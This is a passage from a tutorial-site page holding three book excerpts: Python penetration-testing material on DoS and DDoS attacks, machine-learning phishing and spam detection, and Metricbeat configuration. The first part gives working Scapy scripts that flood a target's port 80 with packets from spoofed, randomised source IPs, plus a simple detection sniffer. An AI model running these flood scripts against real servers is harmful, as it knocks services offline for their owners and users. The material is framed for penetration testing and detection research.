and the source port address. Let's check the output on the attacker's machine:  Single IP with single port I have used a spoofed IP in order to hide my identity. You will have to send a huge number of packets to check the behavior of the web server. During the attack, try to open a website hosted on a web server. Irrespective of whether it works or not, write your findings in the reports. Let's check the output on the server side:  Wireshark output on the server This output shows that our packet was successfully sent to the server. Repeat this program with different sequence numbers. Single IP multiple port Now, in this attack, we use a single IP address but multiple ports. Here, I have written the code of the simp.py program: from scapy.all import *   src = raw_input("Enter the Source IP ") target = raw_input("Enter the Target IP ")   i=1 while True: for srcport in range(1,65535):    IP1 = IP(src=src, dst=target)    TCP1 = TCP(sport=srcport, dport=80)    pkt = IP1 / TCP1    send(pkt,inter= .0001)    print "packet sent ", i    i=i+1 I used the for loop for the ports Let's check the output of the attacker:  Packets from the attacker's machine The preceding screenshot shows that the packet was sent successfully. Now, check the output on the target machine:  Packets appearing in the target machine In the preceding screenshot, the rectangular box shows the port numbers. I will leave it to you to create multiple IP with a single port. Multiple IP multiple port In this section, we will discuss the multiple IP with multiple port addresses. In this attack, we use different IPs to send the packet to the target. Multiple IPs denote spoofed IPs. The following program will send a huge number of packets from spoofed IPs: import random from scapy.all import * target = raw_input("Enter the Target IP ")   i=1 while True: a = str(random.randint(1,254)) b = str(random.randint(1,254)) c = str(random.randint(1,254)) d = str(random.randint(1,254)) dot = "." src = a+dot+b+dot+c+dot+d print src st = random.randint(1,1000) en = random.randint(1000,65535) loop_break = 0 for srcport in range(st,en):    IP1 = IP(src=src, dst=target)    TCP1 = TCP(sport=srcport, dport=80)    pkt = IP1 / TCP1    send(pkt,inter= .0001)    print "packet sent ", i    loop_break = loop_break+1    i=i+1    if loop_break ==50 :      break In the preceding code, we used the a, b, c, and d variables to store four random strings, ranging from 1 to 254. The src variable stores random IP addresses. Here, we have used the loop_break variable to break the for loop after 50 packets. It means 50 packets originate from one IP while the rest of the code is the same as the previous one. Let's check the output of the mimp.py program:  Multiple IP with multiple ports In the preceding screenshot, you can see that after packet 50, the IP addresses get changed. Let's check the output on the target machine:  The target machine's output on Wireshark Use several machines and execute this code. In the preceding screenshot, you can see that the machine replies to the source IP. This type of attack is very difficult to detect because it is very hard to distinguish whether the packets are coming from a valid host or a spoofed host. Detection of DDoS When I was pursuing my Masters of Engineering degree, my friend and I were working on a DDoS attack. This is a very serious attack and difficult to detect, where it is nearly impossible to guess whether the traffic is coming from a fake host or a real host. In a DoS attack, traffic comes from only one source so we can block that particular host. Based on certain assumptions, we can make rules to detect DDoS attacks. If the web server is running only traffic containing port 80, it should be allowed. Now, let's go through a very simple code to detect a DDoS attack. The program's name is DDOS_detect1.py: import socket import struct from datetime import datetime s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8) dict = {} file_txt = open("dos.txt",'a') file_txt.writelines("**********") t1= str(datetime.now()) file_txt.writelines(t1) file_txt.writelines("**********") file_txt.writelines("n") print "Detection Start ......." D_val =10 D_val1 = D_val+10 while True:   pkt = s.recvfrom(2048) ipheader = pkt[0][14:34] ip_hdr = struct.unpack("!8sB3s4s4s",ipheader) IP = socket.inet_ntoa(ip_hdr[3]) print "Source IP", IP if dict.has_key(IP):    dict[IP]=dict[IP]+1    print dict[IP]    if(dict[IP]>D_val) and (dict[IP]<D_val1) :        line = "DDOS Detected "      file_txt.writelines(line)      file_txt.writelines(IP)      file_txt.writelines("n")   else: dict[IP]=1 In the previous code, we used a sniffer to get the packet's source IP address. The file_txt = open("dos.txt",'a') statement opens a file in append mode, and this dos.txt file is used as a logfile to detect the DDoS attack. Whenever the program runs, the file_txt.writelines(t1) statement writes the current time. The D_val =10 variable is an assumption just for the demonstration of the program. The assumption is made by viewing the statistics of hits from a particular IP. Consider a case of a tutorial website. The hits from the college and school's IP would be more. If a huge number of requests come in from a new IP, then it might be a case of DoS. If the count of the incoming packets from one IP exceeds the D_val variable, then the IP is considered to be responsible for a DDoS attack. The D_val1 variable will be used later in the code to avoid redundancy. I hope you are familiar with the code before the if dict.has_key(IP): statement. This statement will check whether the key (IP address) exists in the dictionary or not. If the key exists in dict, then the dict[IP]=dict[IP]+1 statement increases the dict[IP] value by 1, which means that dict[IP] contains a count of packets that come from a particular IP. The if(dict[IP]>D_val) and (dict[IP]<D_val1) : statements are the criteria to detect and write results in the dos.txt file; if(dict[IP]>D_val) detects whether the incoming packet's count exceeds the D_val value or not. If it exceeds it, the subsequent statements will write the IP in dos.txt after getting new packets. To avoid redundancy, the (dict[IP]<D_val1) statement has been used. The upcoming statements will write the results in the dos.txt file. Run the program on a server and run mimp.py on the attacker's machine. The following screenshot shows the dos.txt file. Look at that file. It writes a single IP 9 times as we have mentioned D_val1 = D_val+10. You can change the D_val value to set the number of requests made by a particular IP. These depend on the old statistics of the website. I hope the preceding code will be useful for research purposes. Detecting a DDoS attack If you are a security researcher, the preceding program should be useful to you. You can modify the code such that only the packet that contains port 80 will be allowed. Summary In this article, we learned about penetration testing using Python. Also, we have learned about sniffing using Pyython script and client-side validation as well as how to bypass client-side validation. We also learned in which situations client-side validation is a good choice. We have gone through how to use Python to fill a form and send the parameter where the GET method has been used. As a penetration tester, you should know how parameter tampering affects a business. Four types of DoS attacks have been presented in this article. A single IP attack falls into the category of a DoS attack, and a Multiple IP attack falls into the category of a DDoS attack. This section is helpful not only for a pentester but also for researchers. Taking advantage of Python DDoS-detection scripts, you can modify the code and create larger code, which can trigger actions to control or mitigate the DDoS attack on the server. Resources for Article: Further resources on this subject: Veil-Evasion [article] Using the client as a pivot point [article] Penetration Testing and Setup [article]
Read more
  • 0
  • 0
  • 14621
article-image-using-machine-learning-for-phishing-domain-detection-tutorial
Prasad Ramesh
24 Nov 2018
11 min read
Save for later

Using machine learning for phishing domain detection [Tutorial]

Prasad Ramesh
24 Nov 2018
11 min read
Social engineering is one of the most dangerous threats facing every individual and modern organization. Phishing is a well-known, computer-based, social engineering technique. Attackers use disguised email addresses as a weapon to target large companies. With the huge number of phishing emails received every day, companies are not able to detect all of them. That is why new techniques and safeguards are needed to defend against phishing. This article will present the steps required to build three different machine learning-based projects to detect phishing attempts, using cutting-edge Python machine learning libraries. We will use the following Python libraries: scikit-learn Python (≥ 2.7 or ≥ 3.3) NumPy  (≥ 1.8.2) NLTK Make sure that they are installed before moving forward. You can find the code files here. This article is an excerpt from a book written by Chiheb Chebbi titled Mastering Machine Learning for Penetration Testing. In this book, you will you learn how to identify loopholes in a self-learning security system and will be able to efficiently breach a machine learning system. Social engineering overview Social engineering, by definition, is the psychological manipulation of a person to get useful and sensitive information from them, which can later be used to compromise a system. In other words, criminals use social engineering to gain confidential information from people, by taking advantage of human behavior. Social Engineering Engagement Framework The Social Engineering Engagement Framework (SEEF) is a framework developed by Dominique C. Brack and Alexander Bahmram. It summarizes years of experience in information security and defending against social engineering. The stakeholders of the framework are organizations, governments, and individuals (personals). Social engineering engagement management goes through three steps: Pre-engagement process: Preparing the social engineering operation During-engagement process: The engagement occurs Post-engagement process: Delivering a report There are many social engineering techniques used by criminals: Baiting: Convincing the victim to reveal information, promising him a reward or a gift. Impersonation: Pretending to be someone else. Dumpster diving: Collecting valuable information (papers with addresses, emails, and so on) from dumpsters. Shoulder surfing: Spying on other peoples' machines from behind them, while they are typing. Phishing: This is the most often used technique; it occurs when an attacker, masquerading as a trusted entity, dupes a victim into opening an email, instant message, or text message. Steps of social engineering penetration testing Penetration testing simulates a black hat hacker attack in order to evaluate the security posture of a company for deploying the required safeguard. Penetration testing is a methodological process, and it goes through well-defined steps. There are many types of penetration testing: White box pentesting Black box pentesting Grey box pentesting To perform a social engineering penetration test, you need to follow the following steps: Building real-time phishing attack detectors using different machine learning models In the next sections, we are going to learn how to build machine learning phishing detectors. We will cover the following two methods: Phishing detection with logistic regression Phishing detection with decision trees Phishing detection with logistic regression In this section, we are going to build a phishing detector from scratch with a logistic regression algorithm. Logistic regression is a well-known statistical technique used to make binomial predictions (two classes). Like in every machine learning project, we will need data to feed our machine learning model. For our model, we are going to use the UCI Machine Learning Repository (Phishing Websites Data Set). You can check it out at https://archive.ics.uci.edu/ml/datasets/Phishing+Websites: The dataset is provided as an arff file: The following is a snapshot from the dataset: For better manipulation, we have organized the dataset into a csv file: As you probably noticed from the attributes, each line of the dataset is represented in the following format – {30 Attributes (having_IP_Address URL_Length, abnormal_URL and so on)} + {1 Attribute (Result)}: For our model, we are going to import two machine learning libraries, NumPy and scikit-learn. Let's open the Python environment and load the required libraries: >>> import numpy as np >>> from sklearn import * >>> from sklearn.linear_model import LogisticRegression >>> from sklearn.metrics import accuracy_score Next, load the data: training_data = np.genfromtxt('dataset.csv', delimiter=',', dtype=np.int32) Identify the inputs (all of the attributes, except for the last one) and the outputs (the last attribute): >>> inputs = training_data[:,:-1] >>> outputs = training_data[:, -1] We need to divide the dataset into training data and testing data: training_inputs = inputs[:2000] training_outputs = outputs[:2000] testing_inputs = inputs[2000:] testing_outputs = outputs[2000:] Create the scikit-learn logistic regression classifier: classifier = LogisticRegression() Train the classifier: classifier.fit(training_inputs, training_outputs) Make predictions: predictions = classifier.predict(testing_inputs) Let's print out the accuracy of our phishing detector model: accuracy = 100.0 * accuracy_score(testing_outputs, predictions) print ("The accuracy of your Logistic Regression on testing data is: " + str(accuracy)) The accuracy of our model is approximately 85%. This is a good accuracy, since our model detected 85 phishing URLs out of 100. But let's try to make an even better model with decision trees, using the same data. Phishing detection with decision trees To build the second model, we are going to use the same machine learning libraries, so there is no need to import them again. However, we are going to import the decision tree classifier from sklearn: >>> from sklearn import tree Create the tree.DecisionTreeClassifier() scikit-learn classifier: classifier = tree.DecisionTreeClassifier() Train the model: classifier.fit(training_inputs, training_outputs) Compute the predictions: predictions = classifier.predict(testing_inputs) Calculate the accuracy: accuracy = 100.0 * accuracy_score(testing_outputs, predictions) Then, print out the results: print ("The accuracy of your decision tree on testing data is: " + str(accuracy)) The accuracy of the second model is approximately 90.4%, which is a great result, compared to the first model. We have now learned how to build two phishing detectors, using two machine learning techniques. NLP in-depth overview NLP is the art of analyzing and understanding human languages by machines. According to many studies, more than 75% of the used data is unstructured. Unstructured data does not have a predefined data model or not organized in a predefined manner. Emails, tweets, daily messages and even our recorded speeches are forms of unstructured data. NLP is a way for machines to analyze, understand, and derive meaning from natural language. NLP is widely used in many fields and applications, such as: Real-time translation Automatic summarization Sentiment analysis Speech recognition Build chatbots Generally, there are two different components of NLP: Natural Language Understanding (NLU): This refers to mapping input into a useful representation. Natural Language Generation (NLG): This refers to transforming internal representations into useful representations. In other words, it is transforming data into written or spoken narrative. Written analysis for business intelligence dashboards is one of NLG applications. Every NLP project goes through five steps. To build an NLP project the first step is identifying and analyzing the structure of words. This step involves dividing the data into paragraphs, sentences, and words. Later we analyze the words in the sentences and relationships among them. The third step involves checking the text for  meaningfulness. Then, analyzing the meaning of consecutive sentences. Finally, we finish the project by the pragmatic analysis. Open source NLP libraries There are many open source Python libraries that provide the structures required to build real-world NLP applications, such as: Apache OpenNLP GATE NLP library Stanford NLP And, of course, Natural Language Toolkit (NLTK) Let's fire up our Linux machine and try some hands-on techniques. Open the Python terminal and import nltk: >>> import nltk Download a book type, as follows: >>> nltk.download() You can also type: >> from nltk.book import * To get text from a link, it is recommended to use the urllib module to crawl a website: >>> from urllib import urlopen >>> url = "http://www.URL_HERE/file.txt" As a demonstration, we are going to load a text called Security.in.Wireless.Ad.Hoc.and.Sensor.Networks: We crawled the text file, and used len to check its length and raw[:50] to display some content. As you can see from the screenshot, the text contains a lot of symbols that are useless for our projects. To get only what we need, we use tokenization: >>> tokens = nltk.word_tokenize(raw) >>> len(tokens) > tokens[:10] To summarize what we learned in the previous section, we saw how to download a web page, tokenize the text, and normalize the words. Spam detection with NLTK Now it is time to build our spam detector using the NLTK. The principle of this type of classifier is simple; we need to detect the words used by spammers. We are going to build a spam/non-spam binary classifier using Python and the nltk library, to detect whether or not an email is spam. First, we need to import the library as usual: >>> import nltk We need to load data and feed our model with an emails dataset. To achieve that, we can use the dataset delivered by the Internet CONtent FIltering Group. You can visit the website at https://labs-repos.iit.demokritos.gr/skel/i-config/: Basically, the website provides four datasets: Ling-spam PU1 PU123A Enron-spam For our project, we are going to use the Enron-spam dataset: Let's download the dataset using the wget command: Extract the tar.gz file by using the tar -xzf enron1.tar.gz command: Shuffle the cp spam/* emails && cp ham/* emails object: To shuffle the emails, let's write a small Python script, Shuffle.py, to do the job: import os import random #initiate a list called emails_list emails_list = [] Directory = '/home/azureuser/spam_filter/enron1/emails/' Dir_list = os.listdir(Directory) for file in Dir_list: f = open(Directory + file, 'r') emails_list.append(f.read()) f.close() Just change the directory variable, and it will shuffle the files: After preparing the dataset, you should be aware that, as we learned previously, we need to tokenize the emails: >> from nltk import word_tokenize Also, we need to perform another step, called lemmatizing. Lemmatizing connects words that have different forms, like hacker/hackers and is/are. We need to import WordNetLemmatizer: >>> from nltk import WordNetLemmatizer Create a sentence for the demonstration, and print out the result of the lemmatizer: >>> [lemmatizer.lemmatize(word.lower()) for word in word_tokenize(unicode(sentence, errors='ignore'))] Then, we need to remove stopwords, such as of, is, the, and so on: from nltk.corpus import stopwords stop = stopwords.words('english') To process the email, a function called Process must be created, to lemmatize and tokenize our dataset: def Process(data): lemmatizer = WordNetLemmatizer() return [lemmatizer.lemmatize(word.lower()) for word in word_tokenize(unicode(sentence, errors='ignore'))] The second step is feature extraction, by reading the emails' words: from collections import Counter def Features_Extraction(text, setting): if setting=='bow': # Bow means bag-of-words return {word: count for word, count in Counter(Process(text)).items() if not word in stop} else: return {word: True for word in Process(text) if not word in stop} Extract the features: features = [(Features_Extraction(email, 'bow'), label) for (email, label) in emails] Now, let's define training the model Python function: def training_Model (Features, samples): Size = int(len(Features) * samples) training , testing = Features[:Size], Features[Size:] print ('Training = ' + str(len(training)) + ' emails') print ('Testing = ' + str(len(testing)) + ' emails') As a classification algorithm, we are going to use NaiveBayesClassifier: from nltk import NaiveBayesClassifier, classify classifier = NaiveBayesClassifier.train(training) Finally, we define the evaluation Python function: def evaluate(training, tesing, classifier): print ('Training Accuracy is ' + str(classify.accuracy(classifier, train_set))) print ('Testing Accuracy i ' + str(classify.accuracy(classifier, test_set))) In this article, we learned to detect phishing attempts by building three different projects from scratch. First, we discovered how to develop a phishing detector using two different machine learning techniques—logistic regression and decision trees. The third project was a spam filter, based on NLP and Naive Bayes classification. To become a master at penetration testing using machine learning with Python, check out this book Mastering Machine Learning for Penetration Testing. Google’s Protect your Election program: Security policies to defend against state-sponsored phishing attacks, and influence campaigns How the Titan M chip will improve Android security New cybersecurity threats posed by artificial intelligence
Read more
  • 0
  • 0
  • 14615

article-image-how-to-configure-metricbeat-for-application-and-server-infrastructure
Pravin Dhandre
23 Feb 2018
8 min read
Save for later

How to Configure Metricbeat for Application and Server infrastructure

Pravin Dhandre
23 Feb 2018
8 min read
[box type="note" align="" class="" width=""]This article is an excerpt from a book written by Pranav Shukla and Sharath Kumar M N titled Learning Elastic Stack 6.0. This book provides detailed understanding in how you can employ Elastic Stack in performing distributed analytics along with resolving various data processing challenges.[/box] In today’s tutorial, we will show the step-by-step configuration of Metricbeat, a Beats platform for monitoring server and application infrastructure. Configuring Metricbeat   The configurations related to Metricbeat are stored in a configuration file named metricbeat.yml, and it uses YAML syntax. The metricbeat.yml file contains the following: Module configuration General settings Output configuration Processor configuration Path configuration Dashboard configuration Logging configuration Let's explore some of these sections. Module configuration Metricbeat comes bundled with various modules to collect metrics from the system and applications such as Apache, MongoDB, Redis, MySQL, and so on. Metricbeat provides two ways of enabling modules and metricsets: Enabling module configs in the modules.d directory Enabling module configs in the metricbeat.yml file Enabling module configs in the modules.d directory The modules.d directory contains default configurations for all the modules available in Metricbeat. The configuration specific to a module is stored in a .yml file with the name of the file being the name of the module. For example, the configuration related to the MySQL module would be stored in the mysql.yml file. By default, excepting the system module, all other modules are disabled. To list the modules that are available in Metricbeat, execute the following command: Windows: D:packtmetricbeat-6.0.0-windows-x86_64>metricbeat.exe modules list Linux: [locationOfMetricBeat]$./metricbeat modules list The modules list command displays all the available modules and also lists which modules are currently enabled/disabled. As each module comes with the default configurations, make the appropriate changes in the module configuration file. The basic configuration for mongodb module will look as follows: - module: mongodb metricsets: ["dbstats", "status"] period: 10s hosts: ["localhost:27017"] username: user password: pass To enable it, execute the modules enable command, passing one or more module name. For example: Windows: D:packtmetricbeat-6.0.0-windows-x86_64>metricbeat.exe modules enable redis mongodb Linux: [locationOfMetricBeat]$./metricbeat modules enable redis mongodb Similar to disable modules, execute the modules disable command, passing one or more module names to it. For example: Windows: D:packtmetricbeat-6.0.0-windows-x86_64>metricbeat.exe modules disable redis mongodb Linux: [locationOfMetricBeat]$./metricbeat modules disable redis mongodb To enable dynamic config reloading, set reload.enabled to true and to specify the frequency to look for config file changes. Set the reload.period parameter under the metricbeat.config.modules property. For example: #metricbeat.yml metricbeat.config.modules: path: ${path.config}/modules.d/*.yml reload.enabled: true reload.period: 20s Enabling module config in the metricbeat.yml file If one is used to earlier versions of Metricbeat, one can enable the modules and metricsets in the metricbeat.yml file directly by adding entries to the metricbeat.modules list. Each entry in the list begins with a dash (-) and is followed by the settings for that module. For Example: metricbeat.modules: #------------------ Memcached Module ----------------------------- - module: memcached metricsets: ["stats"] period: 10s hosts: ["localhost:11211"] #------------------- MongoDB Module ------------------------------ - module: mongodb metricsets: ["dbstats", "status"] period: 5s It is possible to specify the module multiple times and specify a different period to use for one or more metricset. For example: #------- Couchbase Module ----------------------------- - module: couchbase metricsets: ["bucket"] period: 15s hosts: ["localhost:8091"] - module: couchbase metricsets: ["cluster", "node"] period: 30s hosts: ["localhost:8091"] General settings This section contains configuration options and some general settings to control the behavior of Metricbeat. Some of the configuration options/settings are: name: The name of the shipper that publishes the network data. By default, hostname is used for this field: name: "dc1-host1" tags: The list of tags that will be included in the tags field of every event Metricbeat ships. Tags make it easy to group servers by different logical properties and help when filtering events in Kibana and Logstash: tags: ["staging", "web-tier","dc1"] max_procs: The maximum number of CPUs that can be executing simultaneously. The default is the number of logical CPUs available in the System: max_procs: 2 Output configuration This section is used to configure outputs where the events need to be shipped. Events can be sent to single or multiple outputs simultaneously. The allowed outputs are Elasticsearch, Logstash, Kafka, Redis, file, and console. Some of the outputs that can be configured are as follows: elasticsearch: It is used to send the events directly to Elasticsearch. A sample Elasticsearch output configuration is shown in the following code snippet: output.elasticsearch: enabled: true hosts: ["localhost:9200"] Using the enabled setting, one can enable or disable the output. hosts accepts one or more Elasticsearch node/server. Multiple hosts can be defined for failover purposes. When multiple hosts are configured, the events are distributed to these nodes in round robin order. If Elasticsearch is secured, then the credentials can be passed using the username and password settings: output.elasticsearch: enabled: true hosts: ["localhost:9200"] username: "elasticuser" password: "password" To ship the events to the Elasticsearch ingest node pipeline so that they can be pre-processed before being stored in Elasticsearch, the pipeline information can be provided using the pipleline setting: output.elasticsearch: enabled: true hosts: ["localhost:9200"] pipeline: "ngnix_log_pipeline" The default index the data gets written to is of the format metricbeat-%{[beat.version]}-%{+yyyy.MM.dd}. This will create a new index every day. For example if today is December 2, 2017 then all the events are placed in the metricbeat-6.0.0-2017-12-02 index. One can override the index name or the pattern using the index setting. In the following configuration snippet, a new index is created for every month: output.elasticsearch: hosts: ["http://localhost:9200"] index: "metricbeat-%{[beat.version]}-%{+yyyy.MM}" Using the indices setting, one can conditionally place the events in the appropriate index that matches the specified condition. In the following code snippet, if the message contains the DEBUG string, it will be placed in the debug-%{+yyyy.MM.dd} index. If the message contains the ERR string, it will be placed in the error-%{+yyyy.MM.dd} index. If the message contains neither of these texts, then those events will be pushed to the logs-%{+yyyy.MM.dd} index as specified in the index parameter: output.elasticsearch: hosts: ["http://localhost:9200"] index: "logs-%{+yyyy.MM.dd}" indices: - index: "debug-%{+yyyy.MM.dd}" when.contains: message: "DEBUG" - index: "error-%{+yyyy.MM.dd}" when.contains: message: "ERR" When the index parameter is overridden, disable templates and dashboards by adding the following setting in: setup.dashboards.enabled: false setup.template.enabled: false Alternatively, provide the value for setup.template.name and setup.template.pattern in the metricbeat.yml configuration file, or else Metricbeat will fail to run. logstash: It is used to send the events to Logstash. To use Logstash as the output, Logstash needs to be configured with the Beats input plugin to receive incoming Beats events. A sample Logstash output configuration is as follows: output.logstash: enabled: true hosts: ["localhost:5044"] Using the enabled setting, one can enable or disable the output. hosts accepts one or more Logstash servers. Multiple hosts can be defined for failover purposes. If the configured host is unresponsive, then the event will be sent to one of the other configured hosts. When multiple hosts are configured, the events are distributed in random order. To enable load balancing of events across the Logstash hosts, use the loadbalance flag, set to true: output.logstash: hosts: ["localhost:5045", "localhost:5046"] loadbalance: true console: It is used to send the events to stdout. The events are written in JSON format. It is useful during debugging or testing. A sample console configuration is as follows: output.console: enabled: true pretty: true Logging This section contains the options for configuring the Filebeat logging output. The logging system can write logs to syslog or rotate log files. If logging is not explicitly configured, file output is used on Windows systems, and syslog output is used on Linux and OS X. A sample configuration is as follows: logging.level: debug logging.to_files: true logging.files: path: C:logsmetricbeat name: metricbeat.log keepfiles: 10 Some of the configuration options are: level: To specify the logging level. to_files: To write all logging output to files. The files are subject to file rotation. This is the default value. to_syslog: To write the logging output to syslogs if this setting is set to true. files.path, files.name, and files.keepfiles: These are used to specify the location of the file, the name We successfully configured Beat Library, MetricBeat and developed good transmission of operational metrics to Elasticsearch, making it easy to monitor systems and services on servers with much ease. If you found this tutorial useful, do check out the book Learning Elastic Stack 6.0 to examine the fundamentals of Elastic Stack in detail and start developing solutions for problems like logging, site search, app search, metrics and more.      
Read more
  • 0
  • 0
  • 14609